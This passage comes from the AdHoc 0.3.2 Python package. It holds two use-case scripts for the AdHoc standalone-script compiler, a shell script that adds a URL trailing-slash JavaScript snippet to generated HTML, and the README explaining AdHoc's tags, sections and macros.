'# i:' 'adhoc_template:>\n'
)
# @:adhoc_template:@
"""
Effective input source::
# <:adhoc_template...:>
Effective output source::
# <:adhoc_template...:>
"""
# @:adhoc_template:@ -macros
uc_descr_end = (
'# o:' 'adhoc_template:>\n'
'# <:' 'adhoc_uncomment:>\n'
)
# @:adhoc_template:@
"""
Effective input source::
# <:adhoc_uncomment...:>
Effective output source::
# <:adhoc_template...:>
# <:adhoc_uncomment...:>
"""
# @:adhoc_template:@ -macros
uc_code_beg = (
'# i:' 'adhoc_indent:> 4\n'
'# <:' 'adhoc_template:>\n'
)
# @:adhoc_template:@
"""
For the --template run, indentation is dropped!
Otherwise, input and output versions are identical.
"""
# @:adhoc_template:@ -macros
uc_code_end = (
'# <:' 'adhoc_template:>\n'
'# i:' 'adhoc_indent:>\n'
)
# @:adhoc_template:@
# @:adhoc_template:@ -macros
macros = {
'uc_descr_beg': uc_descr_beg,
'uc_descr_out': uc_descr_out,
'uc_descr_end': uc_descr_end,
'uc_code_beg': uc_code_beg,
'uc_code_end': uc_code_end,
}
# @:adhoc_template:@
# --------------------------------------------------
# |||:sec:||| Generator
# --------------------------------------------------
def catch_stdout(): # ||:fnc:||
"""Install a string IO as `sys.stdout`.
:returns: a state variable that is needed by
:func:`restore_stdout` to retrieve the output as string.
"""
global _AdHocStringIO
if not '_AdHocStringIO' in globals():
_AdHocStringIO = adhoc._AdHocStringIO
output_sio = _AdHocStringIO()
sv_stdout = sys.stdout
sys.stdout = output_sio
return (sv_stdout, output_sio)
def restore_stdout(state): # ||:fnc:||
"""Restore capturing `sys.stdout` and get captured output.
:returns: captured output as string.
:param state: state variable obtained from :func:`catch_stdout`.
"""
sys.stdout, output_sio = state
output = output_sio.getvalue()
output_sio.close()
return output
def main(argv):
'''compiler and help/example/documentation extractor'''
global RtAdHoc
RtAdHoc.macros = macros
if len(argv) > 1:
if argv[1].startswith('-h') or argv[1].startswith('--h'):
print(__doc__)
return 1
if (argv[1] == '--test'):
import doctest
doctest.testmod()
return 0
# @:adhoc_enable:@
# if (argv[1].startswith('--e')):
# export_dir = '__use_case_export__'
# import shutil
# if os.path.exists(export_dir):
# shutil.rmtree(export_dir)
# RtAdHoc.export_dir = export_dir
# RtAdHoc.export(__file__)
# return 0
# @:adhoc_enable:@
if (argv[1].startswith('--c')
or argv[1].startswith('--d')
or argv[1].startswith('--t')):
file_, source = RtAdHoc.std_source_param(__file__)
if 'adhoc' not in globals() and 'rt_adhoc' not in globals():
compiled = source
source = RtAdHoc.export_source(source)
else:
if 'adhoc' not in globals():
# this will most certainly fail
from adhoc import AdHoc as RtAdHoc
RtAdHoc.macros = macros
compiled = None
if argv[1].startswith('--t'):
if len(argv) > 2:
name = argv[2]
docu_input = RtAdHoc.get_named_template(name, source=docu_input)
sys.stdout.write(docu_input)
return 1
# switch to meta tags
sv = RtAdHoc.set_delimiters(('<:', ':>'))
docu_input = RtAdHoc.activate_macros(source)
docu_input = docu_input.replace('t:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
docu_input = RtAdHoc.get_named_template(source=docu_input)
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('i:', ':>'))
RtAdHoc.write_source('-', docu_input)
RtAdHoc.reset_delimiters(sv)
return 1
if compiled is None:
compiled = RtAdHoc().compile(source)
if argv[1].startswith('--c'):
RtAdHoc.write_source('-', compiled)
return 1
if argv[1].startswith('--d'):
# switch to meta tags
state = catch_stdout()
main('script --template'.split())
script = restore_stdout(state)
sv = RtAdHoc.set_delimiters (('<:', ':>'))
indent_tag_sym = 'adhoc_indent'
indent_tag = RtAdHoc.section_tag(indent_tag_sym)
script = ''.join((
'# ' + indent_tag + ' 4\n',
script,
'# ' + indent_tag + '\n',
))
script = RtAdHoc.indent_sections(script, indent_tag_sym)
script = RtAdHoc.section_tag_remove(script, indent_tag_sym)
docu_input = RtAdHoc.activate_macros(source)
docu_input = docu_input.replace(RtAdHoc.section_tag('adhoc_x_script'), script.rstrip())
docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
docu_input = RtAdHoc.get_named_template(source=docu_input)
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
RtAdHoc.write_source('-', docu_input)
compiled = RtAdHoc.activate_macros(compiled)
docu_input = compiled
docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('o:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
docu_input = RtAdHoc.get_named_template(source=docu_input)
RtAdHoc.write_source('-', docu_input)
RtAdHoc.reset_delimiters(sv)
return 1
map(sys.stderr.write, ('error: unknown option `', str(argv[1]), '`\n'))
exit(1)
return 0
# --------------------------------------------------
# |||:sec:||| Script
# --------------------------------------------------
# --------------------------------------------------
# @|:uc_descr_beg:|>
# **Overview**
#
# The entire initialization code looks like this::
#
# <:adhoc_x_script:>
#
# **Uncompiled Script**
#
# The script starts with the AdHoc run-time declaration ::
#
# @|:uc_descr_out:|>
# **Compiled Script**
#
# After adhoc compilation, the run-time class is added and the script
# is modified to::
#
# @|:uc_descr_end:|>
### show code for input only:
# @|:uc_code_beg:|>
# o:adhoc_template:>
# @:adhoc_run_time:@
# o:adhoc_template:>
# @|:uc_code_end:|>
### show description as code for output only:
# i:adhoc_indent:> 4
# @|:uc_descr_beg:|>
# @|:uc_descr_out:|>
# class RtAdHoc (object):
# ...
# @|:uc_descr_end:|>
# i:adhoc_indent:>
# --------------------------------------------------
# @|:uc_descr_beg:|>
# The uncompiled script uses modules :mod:`adhoc` or :mod:`rt_adhoc`
# for class :class:`RtAdHoc`.
#
# @|:uc_descr_out:|>
# Since :class:`RtAdHoc` is incorporated verbatim, there is no need to
# import :mod:`adhoc` or :mod:`rt_adhoc` anymore::
#
# @|:uc_descr_end:|>
# --------------------------------------------------
# @|:uc_descr_beg:|>
#
# Add executable search path to Python module search path::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
# @:adhoc_disable:@
import os
import sys
os_path = os.defpath
if 'PATH' in os.environ:
os_path = os.environ['PATH']
sys_path = sys.path
sys.path.extend(os_path.split(os.pathsep))
# @|:uc_code_end:|>
# --------------------------------------------------
# @|:uc_descr_beg:|>
#
# Import :mod:`adhoc` and use class :class:`adhoc.AdHoc` as
# :class:`RtAdHoc`::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
try:
import adhoc
from adhoc import AdHoc as RtAdHoc
# @|:uc_code_end:|>
# --------------------------------------------------
# @|:uc_descr_beg:|>
#
# Use exported :mod:`rt_adhoc` module, if :mod:`adhoc` is not
# available::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
except ImportError:
try:
import rt_adhoc
from rt_adhoc import RtAdHoc
# @|:uc_code_end:|>
# --------------------------------------------------
# @|:uc_descr_beg:|>
#
# Let the script continue, even if :class:`RtAdHoc` is not available:
#
# ::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
except ImportError:
pass
# @|:uc_code_end:|>
# --------------------------------------------------
# @|:uc_descr_beg:|>
#
# Restore the standard module search path::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
sys.path = sys_path
# @:adhoc_disable:@
# @|:uc_code_end:|>
# --------------------------------------------------
# generator meta program
if __name__ == '__main__':
as_module = False
main(sys.argv) and exit(0)
else:
as_module = True
if not as_module:
pass
# --------------------------------------------------
# @|:uc_descr_beg:|>
# From here on, RtAdHoc can be used for both the uncompiled and compiled version of the script.
#
# @|:uc_descr_out:|>
# The rest of the script is unmodified.
#
# @|:uc_descr_end:|>
# :ide: COMPILE: Run with --template macros
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template macros")))
# :ide: COMPILE: Run with --compile
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with --export; diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --export; diff -u use_case_000_.py __use_case_export__/" (file-name-nondirectory (buffer-file-name)))))
# :ide: COMPILE: Run with --compile >use_case_000.py && --export && diff && rm
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_000.py && python use_case_000.py --export && diff -u use_case_000_.py __use_case_export__/use_case_000.py && rm -rf __use_case_export__")))
# :ide: COMPILE: Run with --compile >use_case_000.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_000.py")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with --doc
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc")))
# :ide: COMPILE: Run with --doc | diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc | ( if test -r uc000; then echo 'DIFF'; diff -u uc000 -; else echo 'STORE'; cat >uc000; fi)")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with python3
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End: | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/use_case_000_.py | use_case_000_.py |
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Included Files
# --------------
#
# Included files are optionally zipped and base64-encoded. They can
# be automatically unpacked, or unpacked via the
# :meth:`adhoc.AdHoc.extract` and
# :meth:`adhoc.AdHoc.get_named_template` mechanisms.
#
# The following Python script include the files ``included1`` and
# ``included2``. ``included1`` is automatically unpacked, if it does
# not already exist, whereas ``included2`` is only available for
# explicit extraction.
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# --------------------------------------------------
# |||:sec:||| Generator
# --------------------------------------------------
uc_descr_beg = (
'# <:' 'adhoc_uncomment:>\n'
'# o:' 'adhoc_template:>\n'
'# i:' 'adhoc_template:>\n'
)
uc_descr_out = (
'# i:' 'adhoc_template:>\n'
)
uc_descr_end = (
'# o:' 'adhoc_template:>\n'
'# <:' 'adhoc_uncomment:>\n'
)
uc_code_beg = (
'# i:' 'adhoc_indent:> 4\n'
'# <:' 'adhoc_template:>\n'
)
uc_code_end = (
'# <:' 'adhoc_template:>\n'
'# i:' 'adhoc_indent:>\n'
)
uc_code_ti_beg = (
'# t:' 'adhoc_template:>\n'
'# o:' 'adhoc_template:>\n'
'# i:' 'adhoc_template:>\n'
)
uc_code_ti_out = (
'# i:' 'adhoc_template:>\n'
)
uc_code_ti_end = (
'# o:' 'adhoc_template:>\n'
'# t:' 'adhoc_template:>\n'
)
macros = {
'uc_descr_beg': uc_descr_beg,
'uc_descr_out': uc_descr_out,
'uc_descr_end': uc_descr_end,
'uc_code_beg': uc_code_beg,
'uc_code_end': uc_code_end,
'uc_code_ti_beg': uc_code_ti_beg,
'uc_code_ti_out': uc_code_ti_out,
'uc_code_ti_end': uc_code_ti_end,
}
INCLUDE1 = """\
# -*- coding: latin1 -*-
abc äöü
fill it up a little ...
"""
INCLUDE2 = """\
# -*- coding: utf-8 -*-
abc äöü
fill it up a little ...
"""
INCLUDES = {
'include1': INCLUDE1,
'include2': INCLUDE2,
}
def main(argv):
'''compiler and help/example/documentation extractor'''
global RtAdHoc
RtAdHoc.macros = macros
if len(argv) > 1:
if argv[1].startswith('-h') or argv[1].startswith('--h'):
print(__doc__)
return 1
if (argv[1].startswith('--c')
or argv[1].startswith('--d')
or argv[1].startswith('--t')):
file_, source = RtAdHoc.std_source_param(__file__)
if 'adhoc' not in globals() and 'rt_adhoc' not in globals():
compiled = source
source = RtAdHoc.export_source(source)
else:
if 'adhoc' not in globals():
# this will most certainly fail
from adhoc import AdHoc as RtAdHoc
RtAdHoc.macros = macros
compiled = None
if argv[1].startswith('--t'):
# switch to meta tags
sv = RtAdHoc.set_delimiters (('<:', ':>'))
docu_input = RtAdHoc.activate_macros(source)
docu_input = docu_input.replace('t:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
docu_input = RtAdHoc.get_named_template(source=docu_input)
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('i:', ':>'))
RtAdHoc.write_source('-', docu_input)
RtAdHoc.reset_delimiters(sv)
return 1
if compiled is None:
for include, isource in INCLUDES.items():
if not os.path.exists(include):
if hasattr(isource, 'decode'):
isource = isource.decode('utf-8')
RtAdHoc.write_source(include, isource)
compiled = RtAdHoc().compile(source.replace('u:' 'adhoc_', '@:' 'adhoc_'))
for include in INCLUDES:
os.unlink(include)
if argv[1].startswith('--c'):
RtAdHoc.write_source('-', compiled.replace('@:' 'adhoc_', 'u:' 'adhoc_'))
return 1
if argv[1].startswith('--d'):
# switch to meta tags
sv = RtAdHoc.set_delimiters (('<:', ':>'))
docu_input = RtAdHoc.activate_macros(source)
docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
docu_input = RtAdHoc.get_named_template(source=docu_input)
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
RtAdHoc.write_source('-', docu_input)
docu_input = RtAdHoc.activate_macros(compiled)
docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('o:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
docu_input = RtAdHoc.get_named_template(source=docu_input)
RtAdHoc.write_source('-', docu_input)
RtAdHoc.reset_delimiters(sv)
return 1
map(sys.stderr.write, ('error: unknown option `', str(argv[1]), '`\n'))
exit(1)
return 0
# --------------------------------------------------
# |||:sec:||| Script
# --------------------------------------------------
# --------------------------------------------------
# @|:uc_descr_beg:|>
# **Uncompiled Script**
#
# The script starts with `Generic AdHoc Initialization`_::
#
# @|:uc_descr_out:|>
# **Compiled Script**
#
# @|:uc_descr_end:|>
# i:adhoc_indent:> 4
# @|:uc_code_ti_beg:|>
# @:adhoc_run_time:@
# @:adhoc_disable:@
# Get RtAdHoc from adhoc or rt_adhoc
import os
import sys
os_path = os.defpath
if 'PATH' in os.environ:
os_path = os.environ['PATH']
sys_path = sys.path
sys.path.extend(os_path.split(os.pathsep))
try:
import adhoc
from adhoc import AdHoc as RtAdHoc
except ImportError:
try:
import rt_adhoc
from rt_adhoc import RtAdHoc
except ImportError:
pass
sys.path = sys_path
# @:adhoc_disable:@
# @|:uc_code_ti_out:|>
# @|:uc_code_ti_end:|>
# i:adhoc_indent:>
# meta program
if __name__ == '__main__':
as_module = False
main(sys.argv) and exit(0)
else:
as_module = True
if not as_module:
pass
# t:adhoc_indent:> -4
# --------------------------------------------------
# @|:uc_descr_beg:|>
# ``include1`` is marked for inclusion at compile time. Since it is
# supposed to exist anyway, no special care is taken to extract it in
# the uncompiled script::
#
# @|:uc_descr_out:|>
# ``include1`` is automatically extracted in the compiled script::
#
# @|:uc_descr_end:|>
# <:adhoc_template:>
# u:adhoc_include:@ include1
# <:adhoc_template:>
# --------------------------------------------------
# @|:uc_descr_beg:|>
# ``include2`` is marked for inclusion at compile time::
#
# @|:uc_descr_out:|>
# The ``if False`` before ``include2`` prevents automatic extraction::
#
# @|:uc_descr_end:|>
# <:adhoc_template:>
if False:
pass
# u:adhoc_include:@ include2
# <:adhoc_template:>
sv = RtAdHoc.section_delimiters
RtAdHoc.section_delimiters = ('u:', ':@')
# --------------------------------------------------
# @|:uc_descr_beg:|>
# There is actually nothing to extract in the uncompiled script::
#
# @|:uc_descr_out:|>
# In the compiled script, ``include2`` will now also be extracted,
# since :meth:`adhoc.AdHoc.extract` finds all sections tagged with
# ``adhoc_unpack``::
#
# @|:uc_descr_end:|>
# <:adhoc_template:>
RtAdHoc.quiet = True
RtAdHoc.extract(__file__)
# <:adhoc_template:>
RtAdHoc.section_delimiters = sv
# --------------------------------------------------
# t:adhoc_indent:>
# :ide: COMPILE: Run with --compile
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with --compile >use_case_002_include.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_002_include.py")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with --doc
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc")))
# :ide: COMPILE: Run with --doc | diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc | ( if test -r uc002; then echo 'DIFF'; diff -u uc002 -; else echo 'STORE'; cat >uc002; fi)")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with python3
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End: | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/use_case_002_include_.py | use_case_002_include_.py |
# z-massage-index.sh - Add stuff to HTML (post-build step)
# usage: z-massage-index.sh [file ...]
#
# Example:
# z-massage-index.sh <README.html >index.html
# Copyright (C) 2012, Wolfgang Scherer, <Wolfgang.Scherer at gmx.de>
#
# This file is part of Adhoc.
#
: # script help
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>,
# or write to Wolfgang Scherer, <Wolfgang.Scherer at gmx.de>
# --------------------------------------------------
# |||:sec:||| FUNCTIONS
# --------------------------------------------------
usage ()
{
script_help="script-help"
( "${script_help}" ${1+"$@"} "${0}" ) 2>/dev/null \
|| ${SED__PROG-sed} -n '3,/^[^#]/{;/^[^#]/d;p;}' "${0}";
}
# (progn (forward-line 1)(snip-insert-mode "^sh_f.awk_var_escape_setup$" t))
bs_escape ()
{
printf "%s\n" "${*}" | ${SED__PROG-sed} 's,\\,\\\\,g'
}
no_bs_escape ()
{
printf "%s\n" "${*}"
}
awk_var_escape_setup ()
{
# It seems most awk's interpret backslashes in `-v var=value',
# however, mawk(1) does not
# |:DBG:| escape_it (original-awk): [bs_escape]
# |:DBG:| escape_it (awk) : [bs_escape]
# |:DBG:| escape_it (gawk) : [bs_escape]
# |:DBG:| escape_it (nawk) : [bs_escape]
# |:DBG:| escape_it (mawk) : [no_bs_escape]
escape_it="no_bs_escape"
AWK_VAR_ESCAPE_CHECK="${1-'\.'}"
AWK_VAR_ESCAPE_RESULT="$( ${AWK__PROG-awk} -v check="${AWK_VAR_ESCAPE_CHECK}" -- 'BEGIN { print check; }' 2>/dev/null </dev/null )"
test x"${AWK_VAR_ESCAPE_CHECK}" = x"${AWK_VAR_ESCAPE_RESULT}" || escape_it="bs_escape"
AWK_VAR_ESCAPE_RESULT="$( ${AWK__PROG-awk} -v check="$( ${escape_it} "${AWK_VAR_ESCAPE_CHECK}" )" -- 'BEGIN { print check; }' 2>/dev/null </dev/null )"
if test x"${AWK_VAR_ESCAPE_CHECK}" != x"${AWK_VAR_ESCAPE_RESULT}"
then
printf >&2 "%s\n" 'error: get another awk(1).'
exit 1
fi
}
test x"${1+set}" = xset && \
case "${1}" in
-\?|-h|--help) usage; exit 0;;
--docu) usage --full; exit 0;;
esac
# --------------------------------------------------
# |||:sec:||| MAIN
# --------------------------------------------------
JS_BITBUCKET='<script type="text/javascript"><!--
// Add a trailing slash to the URL, if it does not end in `.html'\'' or `/'\''.
// Elegant solution from David Chambers [Atlassian]
if (!/(\.html|\/)$/.test(location.pathname)) {
location.pathname += '\''/'\'';
}
//--></script>'
# |:here:|
awk_var_escape_setup "${JS_BITBUCKET}"
${AWK__PROG-awk} -v JS_BITBUCKET="$( ${escape_it} "${JS_BITBUCKET}" )" -- '
{
print;
}
/<[Hh][Ee][Aa][Dd][^>]*>/ {
print JS_BITBUCKET;
}
' ${1+"$@"}
exit # |||:here:|||
#
# :ide-menu: Emacs IDE Main Menu - Buffer @BUFFER@
# . M-x `eIDE-menu' (eIDE-menu "z")
# :ide: SNIP: insert OPTION LOOP
# . (snip-insert-mode "sh_b.opt-loop" nil t)
# :ide: SHELL: Run with --docu
# . (progn (save-buffer) (shell-command (concat "sh " (file-name-nondirectory (buffer-file-name)) " --docu")))
# :ide: SHELL: Run with --help
# . (progn (save-buffer) (shell-command (concat "sh " (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: SHELL: Run w/o args
# . (progn (save-buffer) (shell-command (concat "sh " (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: COMPILE: Run with `cat README.html | ... | tee index.html | diff'
# . (progn (save-buffer) (compile (concat "cat README.html | python ./" (file-name-nondirectory (buffer-file-name)) " | tee index.html | diff -ubB README.html -")))
# :ide: COMPILE: Run with `cat README.html | ... | tee index.html | diff'
# . (progn (save-buffer) (compile (concat "cat README.html | sh ./" (file-name-nondirectory (buffer-file-name)) " | tee index.html | diff -ubB README.html -")))
#
# Local Variables:
# mode: sh
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# End:
# mmm-classes: (here-doc ide-entries) | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/doc/z-massage-index.sh | z-massage-index.sh |
AdHoc Standalone Python Script Generator
########################################
The *AdHoc* compiler can be used as a program (see `Script Usage`_)
as well as a module (see :class:`adhoc.AdHoc`).
Since the *AdHoc* compiler itself is installed as a compiled *AdHoc*
script, it serves as its own usage example.
After installation of the *adhoc.py* script, the full source can be
obtained in directory ``__adhoc__``, by executing::
adhoc.py --explode
.. @@contents@@
Purpose
=======
*AdHoc* provides python scripts with
- template facilities
- default file generation
- standalone module inclusion
See also `Use Cases`_.
*AdHoc* has been designed to provide an implode/explode cycle:
======== ======= ========= ======= =========
source_0 xsource_0
source_1 implode explode xsource_1
... ------> script.py ------> ...
source_n xsource_n
======== ======= ========= ======= =========
where ``xsource_i === source_i``. I.e., ``diff source_i xsource_i``
does not produce any output.
Quickstart
==========
module.py:
| # -\*- coding: utf-8 -\*-
| mvar = 'value'
script.py:
| # -\*- coding: utf-8 -\*-
| # |adhoc_run_time|
| import module # |adhoc|
| print('mvar: ' + module.mvar)
Compilation::
adhoc.py --compile script.py >/tmp/script-compiled.py
Execution outside source directory::
cd /tmp && python script-compiled.py
shows::
mvar: value
Decompilation::
cd /tmp && \
mkdir -p __adhoc__ && \
adhoc.py --decompile <script-compiled.py >__adhoc__/script.py
.. |@:| replace:: ``@:``
.. |:@| replace:: ``:@``
.. |adhoc_run_time| replace:: |@:|\ ``adhoc_run_time``\ |:@|
.. |adhoc| replace:: |@:|\ ``adhoc``\ |:@|
Description
===========
The *AdHoc* compiler/decompiler parses text for tagged lines and
processes them as instructions.
The minimal parsed entity is a tagged line, which is any line
containing a recognized *AdHoc* tag.
All *AdHoc* tags are enclosed in delimiters (default: |@:| and |:@|). E.g:
|@:|\ adhoc\ |:@|
Delimiters come in several flavors, namely line and section
delimiters and a set of macro delimiters. By default, line and
section delimiters are the same, but they can be defined separately.
`Flags`_ are tagged lines, which denote a single option or
command. E.g.:
| import module # |@:|\ adhoc\ |:@|
| # |@:|\ adhoc_self\ |:@| my_module_name
`Sections`_ are tagged line pairs, which delimit a block of
text. The first tagged line opens the section, the second tagged
line closes the section. E.g.:
| # |@:|\ adhoc_enable\ |:@|
| # disabled_command()
| # |@:|\ adhoc_enable\ |:@|
`Macros`_ have their own delimiters (default: |@m| and |m>|). E.g.:
| # |@m|\ MACRO_NAME\ |m>|
The implementation is realized as class :class:`adhoc.AdHoc` which
is mainly used as a namespace. The run-time part of
:class:`adhoc.AdHoc` -- which handles module import and file export
-- is included verbatim as class :class:`RtAdHoc` in the generated
output.
Flags
-----
:|adhoc_run_time|:
The place where the *AdHoc* run-time code is added. This flag must
be present in files, which use the |adhoc| import feature. It
is not needed for the enable/disable features.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_run_time|
:|adhoc| [force] [flat | full]:
Mark import line for run-time compilation.
If ``force`` is specified, the module is imported, even if it
was imported before.
If ``flat`` is specified, the module is not recursively
exported.
If ``full`` is specified, the module is recursively
exported. (This parameter takes priority over ``flat``).
If neither ``flat`` nor ``full`` are specified,
:attr:`adhoc.AdHoc.flat` determines the export scope.
This flag is ignored, if the line is commented out. E.g.:
| # import module # |adhoc|
.. _adhoc_include:
:|adhoc_include| file_spec, ...:
Include files for unpacking. ``file_spec`` is one of
:file:
``file`` is used for both input and output.
:file ``from`` default-file:
``file`` is used for input and output. if ``file`` does not
exist, ``default-file`` is used for input.
:source-file ``as`` output-file:
``source-file`` is used for input. ``output-file`` is used for
output. If ``source-file`` does not exist, ``output-file`` is
used for input also.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_include| file
:|adhoc_verbatim| [flags] file_spec, ...:
Include files for verbatim extraction. See adhoc_include_ for
``file_spec``.
The files are included as |adhoc_template_v| sections. *file* is used
as *export_file* mark. If *file* is ``--``, the template disposition
becomes standard output.
Optional flags can be any combination of ``[+|-]NUM`` for
indentation and ``#`` for commenting. E.g.:
| # |adhoc_verbatim| +4# my_file from /dev/null
*my_file* (or ``/dev/null``) is read, commented and indented 4
spaces.
If the |adhoc_verbatim| tag is already indented, the specified
indentation is subtracted.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_verbatim| file
:|adhoc_self| name ...:
Mark name(s) as currently compiling. This is useful, if
``__init__.py`` imports other module parts. E.g:
| import pyjsmo # |@:|\ adhoc\ |:@|
where ``pyjsmo/__init__.py`` contains:
| # |@:|\ adhoc_self\ |:@| pyjsmo
| from pyjsmo.base import * # |@:|\ adhoc\ |:@|
:|adhoc_compiled|:
If present, no compilation is done on this file. This flag is
added by the compiler to the run-time version.
Sections
--------
:|adhoc_enable|:
Leading comment char and exactly one space are removed from lines
in these sections.
:|adhoc_disable|:
A comment char and exactly one space are added to non-blank
lines in these sections.
:|adhoc_template| -mark | export_file:
If mark starts with ``-``, the output disposition is standard output
and the template is ignored, when exporting.
Otherwise, the template is written to output_file during export.
All template parts with the same mark/export_file are concatenated
to a single string.
:|adhoc_template_v| export_file:
Variation of |adhoc_template|. Automatically generated by |adhoc_verbatim|.
:|adhoc_uncomment|:
Treated like |adhoc_enable| before template output.
:|adhoc_indent| [+|-]NUM:
Add or remove indentation before template output.
:|adhoc_import|:
Imported files are marked as such by the compiler. There is no
effect during compilation.
:|adhoc_unpack|:
Included files are marked as such by the compiler. There is no
effect during compilation.
:|adhoc_remove|:
Added sections are marked as such by the compiler. Removal is
done when exporting.
Before compilation, existing |adhoc_remove| tags are renamed to
|adhoc_remove_|.
After automatically added |adhoc_remove| sections have been
removed during export, remaining |adhoc_remove_| tags are
renamed to |adhoc_remove| again.
.. note:: Think twice, before removing material from original
sources at compile time. It will violate the condition
``xsource_i === source_i``.
:|adhoc_run_time_engine|:
The run-time class :class:`RtAdHoc` is enclosed in this special
template section.
It is exported as ``rt_adhoc.py`` during export.
Macros
------
Macros are defined programmatically::
AdHoc.macros[MACRO_NAME] = EXPANSION_STRING
A macro is invoked by enclosing a MACRO_NAME in
:attr:`adhoc.AdHoc.macro_call_delimiters`. (Default: |@m|, |m>|).
:|MACRO_NAME|:
Macro call.
Internal
--------
:|adhoc_run_time_class|:
Marks the beginning of the run-time class. This is only
recognized in the *AdHoc* programm/module.
:|adhoc_run_time_section|:
All sections are concatenated and used as run-time code. This is
only recognized in the *AdHoc* programm/module.
In order to preserve the ``xsource_i === source_i`` bijective
condition, macros are expanded/collapsed with special macro
definition sections. (See :attr:`adhoc.AdHoc.macro_xdef_delimiters`;
Default: |<m|, |m@|).
:|adhoc_macro_call|:
Macro call section.
:|adhoc_macro_expansion|:
Macro expansion section.
.. include:: USE_CASES.txt
AdHoc Script
============
.. automodule:: adhoc
:members:
:show-inheritance:
.. _namespace_dict:
NameSpace/NameSpaceDict
=======================
.. automodule:: namespace_dict
:members:
:show-inheritance:
.. |adhoc_self| replace:: |@:|\ ``adhoc_self``\ |:@|
